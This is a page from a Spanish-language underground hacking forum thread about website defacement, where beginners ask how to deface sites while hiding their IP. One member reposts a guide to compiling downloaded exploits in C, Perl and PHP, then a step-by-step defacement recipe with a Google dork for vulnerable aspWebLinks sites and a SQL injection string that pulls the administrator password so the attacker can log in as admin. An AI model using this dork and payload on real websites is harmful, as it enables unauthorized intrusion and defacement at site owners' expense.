Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 13, 2008, 06:08:03
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Que es un deface o defacing? 0 Usuarios y 2 Visitantes están viendo este tema. « anterior próximo »
Páginas: 1 2 3 [4] Ir Abajo Imprimir
Autor Tema: Que es un deface o defacing?  (Leído 11592 veces)
'Oryon'
Miembro
*****
Desconectado Desconectado

Mensajes: 28


Vale más poder vivir que solo buscar ver el sol.

darkmotives1.0@hotmail.com // //
Ver Perfil
« Respuesta #45 en: Febrero 21, 2007, 07:18:12 »

En línea

"La inteligencia se construye usandola".
Maxxxxx_--000
Recien Llegado
*
Desconectado Desconectado

Mensajes: 17


La mentira es el refugio de los cobardes


Ver Perfil
« Respuesta #46 en: Marzo 05, 2007, 03:54:19 »

hola a todos es que tenia una pregunta con este tema del defacing

me preguntaba porque yo veo a todo el mundo hablando de esto y lo que me tiene intrigado es si la persona que hace un deface queda expuesta a ser capturadad osea que te agarren por el deface

disculpen si la pregunta es estupida pero bueno es una duda que me quiero sacar
En línea
federinho
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil Email
« Respuesta #47 en: Marzo 26, 2007, 06:01:41 »

En línea
Blackhand
Recien Llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil Email
« Respuesta #48 en: Junio 07, 2007, 10:05:12 »

Me pueden ayudar a empzar en esto...... Huh

Miren... no se nada de hacking y lo que quiero es empezarme pero no me manden tutos de puro leerrr que no hago nada creo que tutos con imagenes son los que mas capto.....

1.. antes de hacer un defacing, ahi que olcultar el ip? cierto? para no dejar rastro??
como se haria....
2. busco las vulnerabilidades con SSS...? y despes que hagoi esk noc???
Despues que me expliquen esto ya captare mas la idea!

GRax.... d3 anteman0..
En línea
reipol16
Miembro
*****
Desconectado Desconectado

Mensajes: 127


reipol15@hotmail.com
Ver Perfil WWW Email
« Respuesta #49 en: Agosto 21, 2007, 07:43:14 »

Me pueden ayudar a empzar en esto...... Huh

Miren... no se nada de hacking y lo que quiero es empezarme pero no me manden tutos de puro leerrr que no hago nada creo que tutos con imagenes son los que mas capto.....

1.. antes de hacer un defacing, ahi que olcultar el ip? cierto? para no dejar rastro??
como se haria....
2. busco las vulnerabilidades con SSS...? y despes que hagoi esk noc???
Despues que me expliquen esto ya captare mas la idea!

GRax.... d3 anteman0..
1.-  Para ocultar tu IP tienes que navegar por un proxy lo puedes buscar por el tito google

2.- Quando hayas hecho el scanner de vulnerabilidades tienes que buscar el exploit y cimpilarlo y entonces te dara instrucciones de lo que tienes que hacer

saludoss
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
belihel
Visitante
« Respuesta #50 en: Diciembre 08, 2007, 12:09:19 »

pues que decir... es un placer tocar temas con dos de las personas que se encuentra en la elite de la informatica... asi que me incluyo en este post para dejar mi opinion...

Hola, vengo a decir algo...

en mi opinion, no son mos que tipos que fantasean Y MUCHO y para peor... mienten, porque no pueden dar algon detalle tocnico de lo que hicieron??

este wey... Grin Grin sin palabras... bah!! algunas en realidad... (ignoracia... sobre todo!!)

Claro y yo hablo escencialmente de un objetivo.


Ahora cuando yo cai en desgracia lo mas sencillo para mi hubiese sido tomar mi laptop y hacerle pedazos la vida "real" a la fulana solo por despecho (o por honor yo que se ..), el caso es que aristotle me dijo que eso no me iba a llevar absolutamente a nada pero que bien me iba a sentir eso si ... je je je

Saludos y espero haber reafirmado o aclarado tu punto.


AzRaEL [NuKE] Team

 

Bueno.. no nos desviemos del tema. Discutoamos sobre el porque.. a parte de muchas otras cosas...

Si tu objetivo es entrar en ese servidor sin afan de joder nada... entraros, avisaros al webmaster del site y ahi se acabaro el tema. Te sentiros satisfecho porque has logrado entrar en un sistema ajeno y encima has tenido la madurez de avisar al webmaster sin daoar nada.



ven como se aprende SOLO LEYENDO??

aqui tienen el ejemplo de como son 2 personas. una que ve que la etica hacker es la que va de la mano con la moral, como dice el maestro Az. y otra que ve que es la que tiene un objetivo etico.. como lo es el propio Az... je..
Viper, ya alguna vez nos encontramos y dije que tus trabajos son exelentes, pues le pones sentimiento a ellos... tienes ese toque de magia para programar y es simplemente brillante... me agrada mucho que tengas esa mentalidad de hacer el bien con tus conocimientos...
Az,  que decir de ti men.. desde 1986 creo que sigo tus pasos... leo muchisimo de ti desde entonces.. es impresionante tu curriculum... a veces me divierto viendo tus andanzas... jeje..
ambos son inspiradores...


"Tanto lamear con defaces rfi (remote file inclusion) y ahora estos jodido Grin"

Saludos!

je... esto me causo tanta gracia que ....  Grin Grin Grin


saludos chicos... Wink Wink Wink


 



En línea
Zpartan
Miembro
*****
Desconectado Desconectado

Mensajes: 47


Algunos nos llaman "Delicuentes" otros "Artistas"

comun@el-hacker.org
Ver Perfil Email
« Respuesta #51 en: Marzo 16, 2008, 09:25:40 »

Asi s
En línea

Quienes somos los chilenos y de donde?

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
                             //\\Orgulloso de ser Chileno//\\
reymagic
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil Email
« Respuesta #52 en: Junio 24, 2008, 10:29:40 »

Me pueden ayudar a empzar en esto...... Huh

Miren... no se nada de hacking y lo que quiero es empezarme pero no me manden tutos de puro leerrr que no hago nada creo que tutos con imagenes son los que mas capto.....

1.. antes de hacer un defacing, ahi que olcultar el ip? cierto? para no dejar rastro??
como se haria....
2. busco las vulnerabilidades con SSS...? y despes que hagoi esk noc???
Despues que me expliquen esto ya captare mas la idea!

GRax.... d3 anteman0..
1.-  Para ocultar tu IP tienes que navegar por un proxy lo puedes buscar por el tito google

2.- Quando hayas hecho el scanner de vulnerabilidades tienes que buscar el exploit y cimpilarlo y entonces te dara instrucciones de lo que tienes que hacer

saludoss

Primero agradecer el esfuerzo de este pedazo de foro!!!

Es dificil ponerse al nivel necesario para poder hacer algo importante, pero mas dificil es bajar de nivel para que los demas le sigan...

que dudas chungas hay aqui...

1º Busco vulnera con el SSS de la pagina en cuestion, ] pero como se usa el SSS y donde consigo un SSS que funcione!, no se como aplicar un programa para que busque las vulneras...pero aqui entrarian las inyecciones SQL?

2ºSuponiendo que encuentre vulneravilidades, busco un exploit y cimpilarlo y entonces te dara instrucciones de lo que tienes que hacer...segun dicen...

Nombre:     M0nster
Título Personalizado:    MURiba Designer
Mensajes:    193 (0.473 por día)
Grupo:    MURibAdmin
Karma:    +15/-0

Exploit (del ingles to exploit, explotar, aprovechar) es el nombre con el que se identifica un programa inform?tico malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa (llamadas bugs). El fin puede ser la destrucci?n o inhabilitaci?n del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.

Un "exploit" es usado normalmente para explotar una vulnerabilidad en un sistema OS y acceder a ?l, lo que es llamado como "rootear".

Los exploits se pueden caracterizar seg?n las categor?as de vulnerabilidades utilizadas:

Vulnerabilidades de desbordamiento de buffer.
Vulnerabilidades de condicion de carrera (race condition).
Vulnerabilidades de error de formato de cadena (format string bugs).
Vulnerabilidades de Cross Site Scripting (XSS).
Vulnerabilidades de Inyeccion SQL.
Vulnerabilidades de Inyeccion de Caracteres (CRLF).
Vulnerabilidades de denegacion del servicio
Vulnerabilidades de Inyeccion m?ltiple HTML (Multiple HTML Injection).
Vulnerabilidades de ventanas enganosas o mixtificaci?n de ventanas (Window Spoofing).

FUENTE




SIGO ABAJO
En línea
reymagic
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil Email
« Respuesta #53 en: Junio 24, 2008, 10:34:47 »

 Como Compilar Exploits en C, Php y Perl

Nombre:     M0nster
Título Personalizado:    MURiba Designer
Mensajes:    193 (0.473 por día)
Grupo:    MURibAdmin
Karma:    +15/-0

Bueno comenzemos este es mi primer manual asi que espero que se entienda intentare hacerlo lo mejor posible para ustedes.

Bueno empezemos con un exploit en C


Primero busquemos uno en
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


pero Como identificamos si nuestro exploit esta en C ? facil los exploits en c siempre al
comienzo llaman a las librerias del mismo

bueno ya tenemos identificado nuestro exploit ahora lo copiamos todo (ojo) ENTERO si se nos
escapa una "," aunque sea el exploit puede no funcionar.
Despues de copiarlo, abrimos el bloc de notas y lo pegamos, despues pones guardar y lo
guardamos como "exploit.c" y donde dice "tipo" seleccionan todos los archivos.
Para compilar un exploit necesitamos un compilador ahora vamos a usar el Cygwin lo pueden
descargar desde
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Una vez descargado lo instalamos(seguir instrucciones de instalador)
Despues de instalarlo buscamos nuestro archivo exploit.c y lo pegamos en la carpeta bin
donde instalamos el compilador por default es c:\cygwin\bin .

Ahora vamos a inicio> ejecutar y ponemos "CMD" .
Listo ahora para llegar ala carpeta donde instalamos el Cygwin debemos poner.
CD..
CD..
CD CYGWIN
CD BIN

Y ya estamos en nuestra carpeta donde esta nuestro exploit
ahora es la hora de la compilacion.
Escribimos: "Cygwin\bin> gcc exploit.c ?o exploit.exe"
Se compilara y luego saldra de nuevo la carpeta del exploit pero ya lo tenemos compilado



Ahora ponemos: "C:\cygwin\bin> exploit.exe" y listo se ejecuta, para seguir depende de cada
exploit debido a que no todos son Iguales.


Compilando En Perl:

Para compilar un exploit en perl se necesita un programa el
Activeperl

Como se reconoce un exploit en perl?
Porque comienzan asi: "#!/usr/bin/perl"

Bueno una vez que tengan instalado el perl buscamos un exploit lo copiamos en un bloc de
notas y lo guardamos como "exploit.pl" en cualquier parte pongamos que lo guardamos en el
disco c

Despues vamos a inicio>ejecutar y escribimos CMD
ahora solo tenemos que escribir "perl exploit.pl" y listo solo sigan las intrucciones de
su exploit.

Compilando En PhP:

Como identificar un exploit escrito en php?
Los exploit en php siempre comienzan de esta forma:
"#!/usr/bin/php"

ahora necesitamos una herramienta el
BamCompile

Despues de instalarlo buscamos nuestro exploit lo copiamos al bloc de notas y lo guadamos
como "exploit.php" en la carpeta del bamcompile
Despues vamos a inicio>ejecutar y escribimos CMD
ahora buscamos la carpeta donde instalaron el bamcompile en mi caso C:/bamcompile
entonces escribimos:
CD..
CD..
CD bamcompile

y ahora solo escribimos: bamcompile exploit.php exploit.exe
listo ya esta compilado ahora solo falta ejecutarlo asi que ponemos
exploit.exe y sigen las intrucciones.


Bueno eso fue todo espero que este lo mas completo posible y recuerden que es mi primer
manual y si faltan datos estaria buenisimo que me ayuden a corregirlo debido a que mis
conocimientos tambien son limitados sobre el tema

fin anticulo_______________________________

ya tendriamos compilado nuestro exploit, ahora como leches lo aplicamos?¿

SIGO ABAJO!
En línea
reymagic
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil Email
« Respuesta #54 en: Junio 24, 2008, 10:41:00 »

INTENTO DE Deface

PARECE QUE FUNCIONA, PERO NO SE LO QUE TENGO ENTRE LAS MANOS!!!

Herramientas

- Un navegador IE o MOZILLA FIREFOX

-Y buena paciensia por si no encunetras a la primera

Procedimiento

debes buscar esto en gogle:  allinurl:links.asp?action=whatsnew



te van a salir resultados esoso resultados son web vulnerables por ejemplo yo encontre


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


espues tenemos que agregar esta inyeccion a la web:  reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config

YO PUSE EN EL NAVEGADOR


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Y ME CANTO

aspWebLinks - Report An Error
Link Title:   netpro  [este es el pass creo..porq....

tenemos que borrar el codigo que pusimos asta el signo igual (=) y agregamos admin


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

y pegamos netpro en el pass

y ya estas en la web como admin.....



En línea
Páginas: 1 2 3 [4] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Que es un deface o defacing? « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC